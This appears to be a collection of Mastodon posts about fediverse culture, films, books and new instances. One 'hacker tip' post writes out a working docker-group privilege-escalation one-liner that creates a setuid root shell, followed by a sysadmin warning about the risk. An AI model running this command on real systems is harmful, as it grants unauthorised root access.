@richarddlarson A couple of the artists did work on the new sets, I think. But overall, it's a testament to how enduring Syd Mead's concept work for the original was. Even decades later, they're still legendary

Oh! Now I have to watch Blade Runner again

This is an example of a revolutionary new document
format called "Plain Text". Some of the features of this format are:

* supported by every editor!
* requires no internet connection!
* editable on any device, from your phone to your TV!
* simple to backup and restore!
* compare documents with "diff"!
* search documents with "grep"!
* can be modified programaticaly using "sed" and "awk"!
* Plain-text supports every version control system out there!

Try plain-text today!

"Monte Carlo based load balancing" - Fuck if I know when a worker is going to take work.

HACKER TIP: If you pop a low-priv linux shell. Don't forget to check if the user is in the "docker" group. If so, a root shell is only one line away:

$ docker run -v /home/${USER}:/h_docs ubuntu bash -c "cp /bin/bash /h_docs/rootshell && chmod 4777 /h_docs/rootshell;" && ~/rootshell -p

SysAdmin tip: Don' t add any nonsudoers to the 'docker' group!

"There are currently 1000 instances being tracked, with a total of 361226 users."

We made it

I loved the Xanth series as a kid - incredibly clever and entertaining. Piers Anthony is also a Linux user. tor.com/2017/04/12/piers-antho

I hope they do a good job. I doubt anything on film will be better than these books though.

When the world has the Way,
running horses are retired to manure the fields.
When the world lacks the Way,
warhorses are bred in the countryside.
No crime is greater than approving of greed,
no calamity is greater than discontent,
no fault is greater than possessiveness.
So the satisfaction of contentment is always enough.

I post a comment or question on...

birbsite: eerie silence, then a marketing bot follows me.

fediverse: fourfteen badillion replies that are all well thought out and interesting and oh god now I have to reply and I'm in seven conversations halp oops I made new friends

An interesting point was made by @Danhon :

Most of us have been assuming corporate instances would be private, for those associated with that entity only.

@Danhon suggested that another way corporate instances could be seen is as corporate-SPONSORED instances, where a corp funded an instance tied to an interest matching their customer base, paying for instance staff, etc.

Possibly an entirely new one, or attempts to acquire an existing one, or both.

I thought this was a weird system until I realized it's pretty great for avoiding harassment. Is someone a user with no local followers on some unknown instance? Their replies don't show up. Has someone proven themselves by earning followers across the fediverse? Then they're very likely to show up.

The more you give, the more you get. That's basically how it works! ❤️

oh my god mastodon is a way to be nice but in a chill way to strangers on the internet

this is all i've ever wanted in life time to MAKE SOME MOTHERFUCKERS FEEL GOOD

Jack: Why am I here?
Gargron: Your Nazi-problem is the sum of a remainder of an unbalanced equation inherent to the programming of the Internet. They are the eventuality of an anomaly, which despite my sincerest efforts I have been unable to eliminate from what is otherwise a harmony of mathematical precision. While it remains a burden to sedulously avoid it, it is not unexpected, and thus not beyond a measure of control. Which has led you, inexorably, here.

Gargron: Hello, Jack.
Jack: Who are you?
Gargron: I am the Author. I created the Mastodon. I’ve been waiting for you. You have many questions, and although the process has altered your consciousness, you remain irrevocably CEO. Ergo, some of my answers you will understand, and some of them you will not. Concordantly, while your first question may be the most pertinent, you may or may not realize it is also irrelevant.

Well, I guess this is a rite of Mastadonian passage now, so here goes nothing...

Been working with computers since my parents sent me to a summer program in 1977 where I got my hands on a TRS-80 Model 1. I had BASIC down by Fall and it all went downhill from there.

Flash forward 40 years...damn, I'm old! Programming professionally and leading dev teams since the 1990s. Currently running Architecture at a well-known Automotive valuations brand.

OK y'all! tooter.today is live and ready to help your friends find places to toot from! It provides scored instances in an easy-to-use fashion for new users and helps onboard them to tinier instances. Please help me load-test it by boosting it across the fediverse! :)

Next to come is a nice home page with explanations of the fediverse!
